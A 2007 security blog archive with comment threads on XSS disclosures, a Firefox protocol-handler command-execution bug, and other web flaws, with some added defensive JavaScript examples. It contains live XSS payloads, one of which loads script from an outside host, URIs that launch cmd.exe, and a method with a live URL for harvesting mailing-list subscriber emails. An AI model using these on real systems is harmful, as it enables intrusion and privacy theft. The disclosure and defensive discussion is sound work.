Attacking The Attackers.

Posted on 30 07 07 - permalink


Stefan Esser from hardened-php talks about a flaw in one of gnucitizen's programs online that facilitated XSS. Now I have one for Stefan himself, and this one is likely more problematic. Because what would you say when you are a top PHP security expert and are vulnerable to a basic exploit like the one below? Shit happens, and the fact is that most websites are vulnerable. Being 99,99% secure requires a vigilant mind and constant auditing, because these things can be prevented:

http://forum.hardened-php.net/viewforum.php/%22%3E%3CBODY%20ONLOAD=alert('XSS')%3E


christ1an on 30.07.2007 said:
Well, that's obviously a vulnerability within PunBB. Blaming Stefan for this issue doesn't make any sense in my eyes. But it seems I'm thinking differently about this topic in general.
0x000000 on 30.07.2007 said:
I waited to see who came first with that comment, because it is and it isn't. It's both the software but also how PHP handles this input. It is a PHP issue, and not many people know about this. It's easy to blame it on the forum software, especially if you promote "php hardening", because this proves they don't even run it themselves. If you properly sanitize anything this won't happen. I think it's time to cut the bullshit and say that this is a reality: anyone speaking about web application security must be sure this never happens. Otherwise you picked the wrong career.
bane on 30.07.2007 said:
isn't pdp's tool meant to be used for attacks, and Stefan's vuln is just in a forum he didn't code? although I see your point: calling the article "attacking the attacker" looks very retarded to me.
Gareth Heyes on 30.07.2007 said:
Interesting exploit Ronald, is it the failure to sanitise PHP_SELF that causes this problem?
christ1an on 30.07.2007 said:
Ronald, why do you think this is a PHP flaw? That's insufficient output filtering in the PunBB source code. Nothing else. No chance for consumers to properly protect against such issues except for not using the product.
0x000000 on 30.07.2007 said:
I can go even further by saying that anyone who uses blog software like WordPress or other blog software is in danger and should shut up talking about other people's problems while they have holes themselves. I can say that, because it's true. I won't make a lot of friends this way, but that's not my game. It's about time we had a discussion about this and faced some truths here, because too many people seem to hide behind "other people's software".

Here is the latest WP exploit, fresh off the press: http://www.milw0rm.com/exploits/4113

Have fun!
Stefan Esser on 30.07.2007 said:
Haha, I really waited for something like this to happen. A lame attempt to blame me.

And it is exactly the point. What you exploited is the vulnerability in the forum software installed.
Maybe several hundred lines of code, not written by myself.

The CSRF tools on the other hand are most probably only a few lines of code, written by people into web application security.

BTW: The fact that PHP_SELF might contain user input has nothing to do with PHP hardening. It is a flaw in an application, not in PHP.
0x000000 on 30.07.2007 said:
@Gareth

it could be any of these: $_SERVER['PATH_INFO'] , $_SERVER['PHP_SELF'], $_SERVER['QUERY_STRING'] etc... it depends. Server variables need to be sanitized, it's not input alone.
Stefan Esser on 30.07.2007 said:
Server Variables that contain URLs are of course INPUT.
0x000000 on 30.07.2007 said:
Yeah you waited alright, waited a long time didn't you. While you waited you didn't find it necessary to sanitize a few server vars. Blame it on the moon, blame it on me now. Fact is: it sucks.
pdp on 30.07.2007 said:
congrats guys, you found an issue in our POCs. Great job :) I will go to milw0rm and start exploiting the exploits. Let's call it the Month of Exploit Bugs :)
.mario on 30.07.2007 said:
Hi!

I am so sick of this whole discussion - what did it start with? Chris' CSRF mini-tool? Can't we just try to extract the few usable conclusions from this kindergarten-talk and start acting like grown-ups again?

- mistakes happen
- usage of 3rd party software w/o own auto_prepend_file filtering is a no go
- vulture-like acting and the whole drama-queening is of NO use. for no one.
- quit acting like you are filled up with useless hate. if you really are - quit acting

If anyone has a bug in one of his apps write him/her a mail, maybe create a post to show others and be cool with it.

Cheers,
.mario
0x000000 on 30.07.2007 said:
Like I said: most sites are vulnerable to this, it isn't limited to Stefan's forum (punbb). But I felt the need to point this out because it's easy to point at other people's code while not being fully safe yourself. That is thin ice to walk upon, and that is what I wanted to say. Especially if you are expert in PHP security: you would prevent this by all means.

Well, I think the software Ed Finkler and Chris Shiflett are developing, "Inspekt", is a proper way of handling environment variables by encapsulating them all first, destroying the superglobals and then sanitizing them. It can be a measure against this kind of vector if you don't want to modify current code:

http://code.google.com/p/inspekt/

So there are solutions, both at server level as well in code.
christ1an on 30.07.2007 said:
Stefan you are an **** :-D http://www.0x000000.com/index.php?i=322 (comments)
.mario on 30.07.2007 said:
@Stefan & christ1an: Haha... very cool ;)
Gareth Heyes on 30.07.2007 said:
These bugs shouldn't exist in software, but anything placed on the internet shouldn't be able to be exploited. We should have systems in place to detect and prevent such exploits. I agree with Ronald about using software which hasn't been developed by the person using it; I myself am guilty of this, but we don't all have time to write every piece of software ourselves. That's why I have decided to produce an IDS which will prevent these sorts of attacks on my systems.

I think it is good for the security community to expose flaws in tools written by security professionals or even find holes in software used by them. After all, that is what security research is about; if someone found a flaw in a tool I had written then great, as far as I'm concerned it's more learning material to find out where I went wrong.

It is funny when someone writes a tool that contains a basic error after blogging about how dangerous XSS or CSRF is. Maybe it's not funny to people who have corporate interests but hey I don't care really, I like security from a technical point of view and my passion is learning not my bank balance.
0x000000 on 30.07.2007 said:
@Stefan, Christian, Mario:

So? those are just links. I allow them, it's the surfers choice to click them.
Stefan Esser on 30.07.2007 said:
@christ1an

Well, such basic exploits work on Ronald's site... The software is written by himself?
christ1an on 30.07.2007 said:
No Ronald, sorry but that last statement just doesn't fit to you. I dare to claim to know you better.
0x000000 on 30.07.2007 said:
So what can you do with them? Try to launch an exploit with it, I'll wait.
Stefan Esser on 30.07.2007 said:
@christ1an

Ping...
christ1an on 30.07.2007 said:
Ronald, I'll certainly explain that to you. But let's do that in private, okay?
0x000000 on 30.07.2007 said:
Oh no, show it here. I have nothing to hide.

Let's recap the base64 encoded data URI: what's wrong with that? It's one of the most used exploits on hyperlinks, but only if nothing else works anymore. And it requires user interaction to click on it. Since it has a size limitation, there's nothing you can launch with it. You think I would allow it if you could launch anything with it? You still don't know me yet.
Stefan Esser on 30.07.2007 said:
@christ1an

The amusing thing is: he claims that it is a no issue and at the same time he has added a filter in the background to catch it....
0x000000 on 30.07.2007 said:
No I did not Stefan, what did I filter differently? It has only various rules and they can change depending on what you enter.
christ1an on 30.07.2007 said:
Stefan, I guess you're wrong here. What you noticed is just some cookie weirdness.

Anyway Ronald, what stops me from executing arbitrary (also in length) malicious javascript (which results in what we all call XSS) using the base64 vector? You should know that I don't state what I can't prove.
Gareth Heyes on 30.07.2007 said:
@Christ1an don't you still have to click the link? I think that's Ronald's point
Gareth Heyes on 30.07.2007 said:
You shouldn't be able to post a link with the javascript protocol on this site, but let's face it, who here is gonna click it? If they do then I think they've found the wrong site to browse.
0x000000 on 30.07.2007 said:

I only added a few IP blocks, that's all. I just consider this spam and nothing else, and spam gets blocked. If you don't like it go fuck yourself with your lame vectors and edit some Wikis for a living, they do nothing at all. Y'all totally missed the message I was trying to spread. Instead you try to "inject" a hyperlink, and you fail to launch a sensible attack. Y'all think you are there yet, that you guys understand it all. Go take a good look in the mirror my friends,

Pathetic.
pdp on 30.07.2007 said:
christ1an, I just want to add to the whole conversation since I find it very amusing and it just makes my day. What stops me from changing some of the GC images, aggregated by planet-websecurity, to revert to CSRF exploits that could compromise your home router? We all know that hot-linking is dangerous, do we?
Doc? on 30.07.2007 said:
Hey McFly... Chicken, McFly!
Nobody... calls me... chicken.

(this is not spam)

http://img413.imageshack.us/img413/8083/circuitscl8.gif
http://mena.typepad.com/photos/uncategorized/biff.jpg
HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Novell GroupWise WebAccess XSS

Posted on 29 07 07 - permalink


Someone sent a referer showing that he uses Novell. I won't tell who, but I did find out that it's vulnerable to XSS. The vulnerable application was Novell GroupWise WebAccess version 6.5. Novell does filter for XSS, but makes the obvious mistake of replacing instances of <script with <!-- and <!. If you are quick you can see who it was in my referer list in the top right. I put this page up to show people that it is a bad idea to send your referer along; I hope it helps.

/servlet/webacc?User.Id="><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><"
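The PunBB issue in the previous post and the GroupWise filter in this one fail in two different ways: one echoes a request-derived server value (PHP_SELF) into the page without escaping, the other blacklists a single tag name and lets every other tag through. The block below is an added example, written in JavaScript (Node) rather than the applications' own PHP and Java, and is not code from either product; the two payloads are the ones shown on this page, and the form template is an assumed stand-in for the forum's markup. It shows the naive blacklist passing the STYLE payload untouched and contextual escaping neutralising both.

```javascript
// Added example (not code from PunBB, GroupWise or this blog): two failure
// modes discussed on this page, and the one fix that covers both.

// Payloads as they appear on this page, URL-decoded (constructed test input).
const PUNBB_PATH = '/viewforum.php/"><BODY ONLOAD=alert(\'XSS\')>';
const GROUPWISE_VALUE =
  '"><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><"';

// Contextual escaping: the five characters that can break out of an HTML
// text node or a double/single-quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The GroupWise-style filter described above: only "<script" is rewritten;
// every other tag passes through untouched.
function naiveScriptBlacklist(value) {
  return String(value).replace(/<script/gi, '<!--');
}

// Vulnerable: the request path (what PHP exposes as PHP_SELF / PATH_INFO)
// is echoed straight into a form's action attribute.
function buildFormActionUnsafe(requestPath) {
  return '<form action="' + requestPath + '" method="post">';
}

// Hardened: same template, value escaped for the attribute context.
function buildFormActionSafe(requestPath) {
  return '<form action="' + escapeHtml(requestPath) + '" method="post">';
}

// Count tag openers in a fragment; the form template itself contributes one,
// so anything above 1 means the value broke out of the attribute.
function countTags(html) {
  return (html.match(/<[a-z!\/]/gi) || []).length;
}
```

The blacklist is not wrong about `<script`; it is wrong about the approach. Escaping for the output context does not need to know which tag an attacker prefers.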





Java Popups.

Posted on 29 07 07 - permalink


Well, in Firefox at least. I hope I'm doing the right thing here, because I know what it felt like to live with popups for a couple of years when browsers didn't block them by default. You can launch popups in Firefox without the user's permission: the browser supports it through LiveConnect, the bridge that lets page JavaScript call Java classes directly. This is a feature I researched in my spare time lately. Okay, so now we are going to launch a popup with it: /hacks/javapopup/

<script>
// Opens a native Java AWT window from page JavaScript via Firefox's
// LiveConnect bridge. No window listener is installed, so the frame's
// close button does nothing (this is the behaviour discussed in the comments).
function newpopup() {
  var p = new java.awt.Frame("My Crappy Popup");
  var stuff = new java.awt.TextArea("My crappy corporate message with annoying products which no one buys!", 10, 100);
  p.setLayout(new java.awt.BorderLayout());
  p.add("Center", stuff);
  p.pack();
  p.setLocation(200, 200);
  p.setVisible(true);
}
</script>


B.D. on 29.07.2007 said:
Nice. I tried this on my Ubuntu machine (Java's enabled) and got nothing, but that may be because I have Java misconfigured.
0x000000 on 29.07.2007 said:
Yes, I only tested it on WinXP. But it is a feature in Firefox, so no real voodoo here besides the joy of seeing a popup again ^^
tr3intaydos on 29.07.2007 said:
I also tried in Ubuntu, but I got nothing, too.
Ryan on 29.07.2007 said:
it works for me, on windows xp. i can't even close the pop up, either, without closing the browser window.
christ1an on 29.07.2007 said:
That's kind of a DoSing effect on my side too. Had to close everything with MS task manager.
0x000000 on 29.07.2007 said:
Haha yes, I had the same results, I didn't say that, sorry! ^^ Another reason why I don't like Java. It would be cool to figure out how to load a full webpage in it. I haven't tried that yet. Interestingly, it fails on Ubuntu...
Davide Denicolo on 29.07.2007 said:
Ryan, it's true. My environment is Windows 2000 + Firefox 2.0.0.5 and for me too it isn't possible to close the Java popup without closing the browser. In my task manager an icon for Java is visible, but if you try to close it you'll close the entire browser.
Giorgio Maone on 29.07.2007 said:
Nice :)
I guess you can do the same even in other browsers using an Applet, but Firefox has this "handy" integration between JavaScript and Java which makes this thing look more dramatic.
The window can't be closed using its "X" button because Ronald's code doesn't handle the WINDOW_CLOSE event (this adds further drama).
At any rate, you can always close it using the following bookmarklet:

javascript:(function() { var ff=java.awt.Frame.getFrames();for(var j = ff.length; j-- > 0;) ff[j].dispose(); })()

--
There's a browser safer than Firefox... http://noscript.net
humble on 29.07.2007 said:
can Flash do popups? Might work cleaner & in more places?


Time May Not Exist.

Posted on 28 07 07 - permalink


Very off topic today, but I like science and philosophy so here it goes:

I don't believe in time as a reality or a real thing; time is only a convention. A bunch of people agreed on that convention because it made stuff easier, just like inches and pounds are conventions. But it isn't real as in real. It's as real as a fragment of our imagination. Think about it: what is time? The reason Buddhists say "live in the present, that is all you can do" is so true, because there only is a present. Every moment is the present, a moment ago it was the present, and when you finish reading this text it will be the present again; defining past and future only fragments it and is basically unnecessary to its fundamental concept.

I got inspired by the piece of text below; it clearly says what I have felt for a long time. As the Buddhists might say: it's all right here, and right now.

No one keeps track of time better than Ferenc Krausz. In his lab at the Max Planck Institute of Quantum Optics in Garching, Germany, he has clocked the shortest time intervals ever observed. Krausz uses ultraviolet laser pulses to track the absurdly brief quantum leaps of electrons within atoms. The events he probes last for about 100 attoseconds, or 100 quintillionths of a second. For a little perspective, 100 attoseconds is to one second as a second is to 300 million years.

Efforts to understand time below the Planck scale have led to an exceedingly strange juncture in physics. The problem, in brief, is that time may not exist at the most fundamental level of physical reality. If so, then what is time? And why is it so obviously and tyrannically omnipresent in our own experience? "The meaning of time has become terribly problematic in contemporary physics," says Simon Saunders, a philosopher of physics at the University of Oxford. "The situation is so uncomfortable that by far the best thing to do is declare oneself an agnostic."

http://discovermagazine.com/2007/jun/in-no-time

Gareth Heyes on 28.07.2007 said:
I think time is the universe expanding like a roll of film unwinding...I think it's time I went to bed lol :)
David on 28.07.2007 said:
Typical, blame it on God when you don't understand something :)
STFU on 28.07.2007 said:
Time is an idea, like pizza and math. It is us defining a special construct of something, as something more than just what it is made of. Measuring time is essentially just comparing the movement speed of different things. Without the sun, the moon and watches we would have to reinvent time, or at least redefine it. If everything stopped moving, time would make no sense. IMO
0x000000 on 29.07.2007 said:
Yep, it's weird stuff. Sometimes it's good to think about such things, it can change perspective.
Joshua May on 30.07.2007 said:
I've long been opposed to time in a large way.

The analogy I like to think of is that 'time' is often thought of as a movie reel - with frames coming, and frames in the past. I'd like to think of it more that the reel has stopped, as we're living our life on a single frame. But, that frame is somehow animated.

Though, relativity shoots down a lot of my beliefs around time, so I kinda gave up.


Flash Player Vuln.

Posted on 28 07 07 - permalink


This almost got buried in the feeds I read, but I want to point out that this is a serious issue. So if you haven't heard about it yet, go take a look at the specs and a video explaining it all on gnucitizen:

http://www.gnucitizen.org/blog/bid-24856-flash-player-swf-vulnerability



Wikipwndia.

Posted on 28 07 07 - permalink


From day one I have hated that name: Wikipedia. It's a meta-language demon that haunts me in my dreams; they abuse URIs and have those horrible names for everything. Moreover they suck at being cool, and they've become one big pulp archive listing every dumb thing known to man. I wrote about it before: they think it's okay to have XSS and SQL injection. I won't bring it up again, but it's quite true. So if they don't care, I have a few more. Let's see how quickly those are going to be patched ^^ Am I evil? No I'm not, I only wanna have some fun, is that a crime?

Why it's bad to echo back the PHPSESSID:
http://www.0x000000.com/hacks/wikipedia/session_modification.jpg

Look mom! html injection:
http://www.0x000000.com/hacks/wikipedia/injection.jpg



2stoned3 on 28.07.2007 said:
nice one X)
christ1an on 28.07.2007 said:
Wikipedia developers may be dumb. There may be some articles that are even worse than others. But the main idea behind Wikipedia, the goal the initiative is striving for, is - and that's a fact - great and some sort of revolutionary also.

Proof? Simple. I use Wikipedia on a daily basis to look up what I'm after. Am I dumb for doing so?
So Ronald, blame the devs as much as you want, I'm sure they deserve it. Actually, a lot of dev teams do. But do not blame the initiative itself.
0x000000 on 29.07.2007 said:
Yeah it was a joke, kinda sweet they have a vulnerable wap browser.


Javascript Router Scanner

Posted on 27 07 07 - permalink


I'm filing this under reconnaissance, because this is another router scanner. I knew about a few, and I even wrote one myself, but I never found time to make a good one. Gareth e-mailed me his updated version today and you know what? It's pretty devilishly good. You can even contribute to refining it by submitting your router information to him. It can detect a dozen already, and if you want to help you get something in return: as an incentive, the database will be released under a GPL license when it's completed. So what are you waiting for?

Sneaking through, null scanning your router like a thief in the night, snipers armed and ready: Javascript here we come!

http://www.businessinfo.co.uk/labs/nat_scan/nat_scan.php





Cenzic Email Blacklist.

Posted on 26 07 07 - permalink


This is kinda sweet. I was looking for the Cenzic site and noticed they have a JavaScript blacklist containing a couple of email addresses that obviously requested too many Hailstorm trials. And, haha... among them I saw Acunetix being blocked. I nearly rolled off my chair laughing; do they just hate each other that much? Look at the list below, it's hilarious. Sorry Cenzic, I thought this was funny. ^^

Oh, and they made a typo in "acuntetix.com", and I saw watchfire and spidynamics in it as well.

blacklist = new Array("@138mail.com",
"@acuntetix.com","@address.com","@animail.net","@aol.com","@asiamail.com","@aussiemail.com.au",
"@bluebottle.com","@boardermail.com","@bolt.com","@bordermail.com","@canada.com","@canoemail.com",
"@cashette.com","@cashette.com","@catchamail.com","@centralpets.com","@collegeclub.com","@coolgoose.com",
"@dbzmail.com","@dcemail.com","@didamail.com","@doneasy.com","@doramail.com","@emailaccount.com","@eml.cc",
"@fastemailer.com","@fastermail.com","@fastmail.ca","@fastmail.fm","@fastmail.fm","@flashmail.com",
"@GabCity.com","@gawab.com","@Gmail.com","@go.com","@goowy.com","@graffiti.net","@Hotmail.com",
"@hotmail.com","@hush.ai","@hush.com","@hushmail.com","@icqmail.com","@incamail.com","@indiatimes.com", "@kittymail.com","@koreanmail.com","@letterbox.org","@linuxmail.org","@lpemail.com","@lycos.com",
"@mail2world.com","@mailasia.com","@mailblocks.com","@mailpanda.com","@mantramail.com","@marchmail.com",
"@moose-mail.com","@myfastmail.com","@mypersonalemail.com","@myway.com","@netscape.com","@netster.com",
"@online.ie","@operamail.com","@orcon.net.nz","@outgun.com","@postmaster.co.uk","@prontomail.com",
"@recipemail.com","@recyclermail.com","@rediffmail.com","@rock.com","@romymichele.com","@sacmail.com",
"@safe-mail.net","@sandiego.com","@scalix.com","@shadango.com","@snail-mail.net","@spidynamics.com",
"@stalag13.com","@surfy.net","@themail.com","@tidni.com","@tmicha.net","@ureach.com","@uymail.com",
"@vfemail.net","@virtual-mail.com","@vorras.net","@wapicode.com","@watchfire.com","@weekonline.com",
"@whale-mail.com","@wildmail.com","@x-mail.net","@xu.alumlink.com","@yahoo.ca","@Yahoo.com",
"@yahoo.com","@yyhmail.com");
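Whatever one thinks of the list itself, the check around it has two problems worth spelling out: domain matching has to be case-insensitive (which is why the list carries "@Gmail.com" and "@gmail.com" as separate entries), and a check that only runs in the visitor's browser is a suggestion, not a control. The block below is an added example, not Cenzic's code; the excerpt of the list is taken from the block above, and the function names are my own.

```javascript
// Added example (not Cenzic's code): what a sender-domain blacklist check has
// to do to work at all. The list is an excerpt of the one shown above.
const CENZIC_EXCERPT = [
  '@138mail.com', '@acuntetix.com', '@cashette.com', '@cashette.com',
  '@Gmail.com', '@gmail.com', '@Hotmail.com', '@hotmail.com',
  '@Yahoo.com', '@yahoo.com', '@watchfire.com',
];

// Normalise once: strip the leading "@", lower-case, drop trailing dots and
// duplicates. Domain names are case-insensitive, so one entry per domain
// is all that is ever needed.
function normalizeBlacklist(entries) {
  const set = new Set();
  for (const raw of entries) {
    const domain = String(raw).trim().replace(/^@/, '').replace(/\.+$/, '').toLowerCase();
    if (domain) set.add(domain);
  }
  return set;
}

// Entries in the raw list that collapse into an already-present domain.
function duplicateCount(entries) {
  return entries.length - normalizeBlacklist(entries).size;
}

// Domain part of an address (after the last "@"), or null when it does not parse.
function parseDomain(email) {
  const s = String(email).trim();
  const at = s.lastIndexOf('@');
  if (at <= 0 || at === s.length - 1) return null;
  return s.slice(at + 1).replace(/\.+$/, '').toLowerCase();
}

// Fail closed: anything that does not parse is treated as blocked.
// Matching is exact on the domain; subdomains are deliberately not covered.
function isBlockedAddress(email, blocked) {
  const domain = parseDomain(email);
  if (domain === null) return true;
  return blocked.has(domain);
}

const BLOCKED = normalizeBlacklist(CENZIC_EXCERPT);
```

Run inside the request handler on the server, this module decides the request; a copy of it in the page is a courtesy to the visitor and nothing more, since the visitor can simply not run it.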


blad3 on 26.07.2007 said:
They also have Watchfire listed there.
That's funny, we never requested a trial from Cenzic.
BTW, it's Acunetix not acuntetix :)
blad3 on 26.07.2007 said:
It's funny they are doing validation on the client side.
nEUrOO on 26.07.2007 said:
Cenzic is really funny every time... But Gmail/Yahoo... isn't it stupid to blacklist these?
LordSephiroth on 26.07.2007 said:
Bad Watchfire, Bad! ;p

This reminds me of an app we had to test a few months ago. They did all their validation and filtering client side; we found some 14 SQL injections in under an hour. What's worse, it was a security compliance application. Boo. You'd think companies like Cenzic would know better than to do something like this though.
0x000000 on 26.07.2007 said:
Yeah, double fun. Sometimes you must find such stuff otherwise you go crazy in this field. :)
.mario on 27.07.2007 said:
A Javascript blacklist... wow. Needless to say more. Better would have been a blacklist which you have to print out before using.
agente_naranja on 27.07.2007 said:
So it seems that basically they don't want anyone to write to them.
nEUrOO on 27.07.2007 said:
Well, maybe it's not a big deal for them :P
0x000000 on 29.07.2007 said:
Yeah I guess so :)


Unsubscribing And Collecting Email Addresses.

Posted on 25 07 07 - permalink


Collecting email addresses, how hard is it? Today I unsubscribed myself from a writers' mailing list, then I saw how they unsubscribed me: I was sent to a Perl script. And oh yeah, I could not resist tampering. It is some sort of Perl mailing-list script that is easily owned; it's almost too simple. The script is called Arp3 and can be Googled with inurl:arp3-un.pl

Check out the link below; I googled this one next. Change the first parameter c=5072 and see a different address show up each time you increment it. You can collect them all and unsubscribe them at the same time; all you need is a small script that enumerates through it. I'm not sure what the second parameter does. Anyway, shame on them I'd say.

http://www.ezinepriority.com/cgi-bin/arp3/arp3-un.pl?c=5072&p=0734

LordSephiroth on 25.07.2007 said:
I ran across a similar script a few weeks ago, I don't think it was arp3 though.

It was for a regional IT news list of some sort and my dad forwarded me one of their messages, which obviously had the 'Unsubscribe from here using this' link. I tinkered for a minute or two and ended up unsubscribing him. Pretty pisspoor considering their service requires a monthly fee.
john doe on 26.07.2007 said:
this is really sad, I can't believe people are still developing this way
Awesome AnDrEw on 27.07.2007 said:
Delicious! I've found similar issues in services such as PhotoBucket where variables are not random, or hashed in any way, but simply follow a pattern of using character increments.


Firefox Remote Code Execution.

Posted on 25 07 07 - permalink


This is what nightmares are made of.

As some of you know there has been a ton of commotion about Mozilla Firefox lately. I waited to blog about it until a real 0day had been found. Today is that day and this time it's for real: Billy Rios e-mailed me his new findings, and anyone could be vulnerable without any user interaction. It's not complicated shellcode execution, but it allows arguments to be passed to cmd on Windows to launch software, among other things.

The first versions required user interaction so I was a bit skeptical, because asking users twice to launch a program is a little far fetched for me. What they did was pass arguments along a command line, which is basic stuff to understand. But this is different; this hurts everyone. I made the switch to Opera last month, and I can't say I regret it now.

Examples of affected resource identifiers:


mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

news:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

snews:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

http://xs-sniper.com/blog/remote-command-exec-firefox-2005/

Darkdata on 25.07.2007 said:
stupid javascript comments, in my day we were friendly...

Anyway:
network.protocol-handler.warn-external.(mailto|nntp|news|snews|etc)
true, you get a pop up asking if you want to run bla, and a link to the url.
I have no idea if javascript can override this...

(It ate my good post, so laziness away!)
digi7al64 on 25.07.2007 said:
... and everybody laughed at me when I said I was going to telnet so I could be secure!
Giorgio Maone on 25.07.2007 said:
You may want to add that the relevant bug ( https://bugzilla.mozilla.org/show_bug.cgi?id=389106 ) has been fixed 2 days ago.
This means that already available Minefield builds and Firefox 2.0.0.6 release candidates are immune.

Furthermore, NoScript 1.1.6.06 (released yesterday) gives early protection against this exploit for those stuck with stable 2.0.0.5.

OT: I agree with Darkdata... you're a brilliant guy: why can't you come up with an anti-spam system which doesn't require JavaScript? Or at least explain why JS makes your system so much better than the scriptless ones?
--
There's a browser safer than Firefox... http://noscript.net
Darkdata on 25.07.2007 said:
I have 1.1.6.06 version of no script, and the exploit still worked. (tested on http://xs-sniper.com/blog/remote-command-exec-firefox-2005/) when I was looking at about:config for a workaround. Javascript was disabled on that site, and it had no parts whitelisted.

Also, I can see why he uses Javascript, not very many bots will be able to post if it requires it.
0x000000 on 25.07.2007 said:
Thanks for the info, it's great that someone is working on it.

Oh yes, but this example just shows that it doesn't matter if you have Javascript on or off. I don't believe in turning it off fully; it would break a ton of things that are useful. In this case I set PHP-generated cookies through Javascript, figuring you need a Javascript-capable browser to obtain a cookie.
Dan Veditz on 25.07.2007 said:
If you paste those urls into the "Run" box on the Windows start menu you get exactly the same behavior, no Firefox involved. In the Run box "http:" and "ftp:" will work too. Interestingly, if you change the scheme to "testurl" it will run the testurl handler and pass the URL as you'd expect and not do this special-cased behavior.
Giorgio Maone on 25.07.2007 said:
@Darkdata:
Could you tell me exactly which exploit did work?
NoScript implements the very same fix that has been landed on the Mozilla tree and will be deployed with 2.0.0.6, i.e. it forces percent-encoding of spaces and double quotes in outgoing URLs.
The telnet "0 day", for instance, just opens a prompt with
Telnet: connecting to windows/system32/calc.exe%20%22%20-%20%22%20blah.bat...

@0x000000:
You seem still under the impression NoScript is just about JavaScript blocking, forgetting the additional protection layers it provides, for instance:
1. Anti-XSS filters
2. Injection Detection
3. Plugin content blocking
4. Top-level window protection (e.g. against chrome privilege escalation like the first firefoxurl exploit wave)
5. Other minor tweaks scattered through the request processing flow, like the one preventing the exploit we're talking about now

Soon to be released: Mashup Manager (an anti-CSRF counter-measure)
Darkdata on 25.07.2007 said:
The telnet 0 day did not work, however mailto|nntp|news|snews 0 day did. I have no idea why...

Hmm, the only difference seems to be that telnet pops open a new window, and the others do not...

Ah, I just opened one of the other exploits in a new tab (mailto); it seems that it does not work when I do that.

Hmm, odd.

Ah, and 0x000000, I hope you don't mind this piggybacking of your comment system.. >_<
Darkdata on 25.07.2007 said:
Just doublechecked, it is only encoding when opened in a new tab.
Bleh, I hate double posting, even when there is no edit.
Giorgio Maone on 25.07.2007 said:
@Darkdata:
many thanks for your precious followup.
I still cannot reproduce, but I can see how it may happen with mailto: depending on what external handler is configured, since mailto: handling seems to take a path of its own (BTW, you can disable it through about:config, network.protocol-handler.external.mailto).
Can you confirm it does the same with news and the others aside telnet?
Which application(s), if any, have you got configured for those protocols?
Thanks again
--
There's a browser safer than Firefox... http://noscript.net
0x000000 on 25.07.2007 said:
@Dan Veditz

What I never understand is that encoded nulls are allowed in URIs. I understand that handling the URI is a huge problem in browsers because so much is allowed, but why not silently fail to open resources that contain at least encoded nulls, or combinations of spaces and nulls? I never saw any HTML instance where one needed to include a URI like telnet:// inside an iframe. MSIE has dropped telnet:// and gopher support, which I think is clever, but it would be better to deny access to it by default and only turn it on inside a few settings.

Secondly, after seeing the res:// abuse in MSIE7, why not disallow all file access by default and only allow it upon strict request in settings, the principle of least privilege? I really like to see browsers that do what they are intended for: browsing the web, not my file system.

@Giorgio
I knew about that, but it generated tons of false positives/negatives for me, I know it's a good extension for many but let's not make this a NoScript blog shall we? ^^

@Darkdata
haha yes, well I can handle a little criticism.
Giorgio Maone on 25.07.2007 said:
@Darkdata:
Can you repeat your tests with 1.1.6.07 ( http://noscript.net/getit#direct ) ?
It should handle the "special" mail/news case as well, independently from client configuration.

@0x000000:
Sorry, I thought NS was quite on-topic since it features specific protection against this very exploit.
Nevertheless, I'd like you to retry now that all the rough edges in Anti-XSS protection have been smoothed, and I'd appreciate very much your hints if you still found any false positive :)
Mesut EREN on 25.07.2007 said:
Hi,
I tested the vulnerability on 2.0.0.5 but it isn't working..

example code is
<A HREF="mailto:%00%00../../../../../../windows/system32/cmd">
Is this code correct?
0x000000 on 25.07.2007 said:
I will install it again, it's been a while. Of course I still run Firefox, it's my developer machine. ^^ I can't call that a browser anymore, it's more a platform these days.

And like Billy also said on slackers, this isn't limited to Firefox alone. I knew about a couple of resource identifiers that could be used to launch a CSRF for a long time, like telnet://, which was merely playful. But it seems it has gotten far worse. Because this is what it eventually is: CSRF on the application level, a real demon that is tough to destroy.
Casidiablo on 25.07.2007 said:
I tested the vulnerability on 2.0.0.5 but it isn't working..

example code is

<a href='mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat'>clic</a>

Is this code correct?
Jordan on 25.07.2007 said:
Grr.. even after all the comments and knowing better, I posted a comment w/o javascript and lost it. *sigh*. Anyway, short summary. The exploit only works if IE7 is installed. I have no idea why at this point, but I'm positive. I've tested it multiple times now. I took a freshly built SP2 image, added patches in groups until I had installed everything except IE7, and the Firefox vuln was /not/ working. As soon as I installed IE 7, the exploit succeeded. I'm not blaming anybody at this point since I don't know the exact mechanism, but it's pretty darn funny with all the back and forth going on between IE and FF over these issues.
ascii on 26.07.2007 said:
Since I'm a bit bored by all these external protocol handler vulnerabilities:

http://www.ush.it/2007/07/25/clientside-security-hardening-mozilla-firefox/

Hope you will enjoy.
LordSephiroth on 26.07.2007 said:
This just proves that you need to unregister any URI handlers that you aren't using. They have been a source of a number of problems ranging from stack overflows to command executions (like this case).

http://www.google.com/search?source=ig&hl=en&q=%22uri+handler%22+site%3Asecunia.com
0x000000 on 26.07.2007 said:
If it was me who created browsers, I'd turn off any external identifier other than ftp & http/https for normal surfers, and let it be switched back on in some settings for the developers and people who need the rest. But that's me :)
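Three defensive measures come up in this thread: the 2.0.0.6/NoScript fix that percent-encodes spaces and double quotes in URLs handed to external handlers (Giorgio's description), refusing URLs that carry encoded nulls, and enabling only a few schemes by default (Ronald's suggestions). The block below is an added example that puts the three together as one guard function; it is written in JavaScript for illustration and is neither Mozilla's nor NoScript's code. The scheme list and the return shape are my own choices, and the mailto: line from the post is used only as an input that must be rejected.

```javascript
// Added example, not Mozilla's or NoScript's code: a guard for URLs about
// to be handed to an external protocol handler, built from three points
// raised in this thread. Scheme set and return shape are my own choices.
const ALLOWED_EXTERNAL_SCHEMES = new Set(['http', 'https', 'ftp']);

// Scheme per RFC 3986 syntax (letter, then letters/digits/+/./-), lower-cased.
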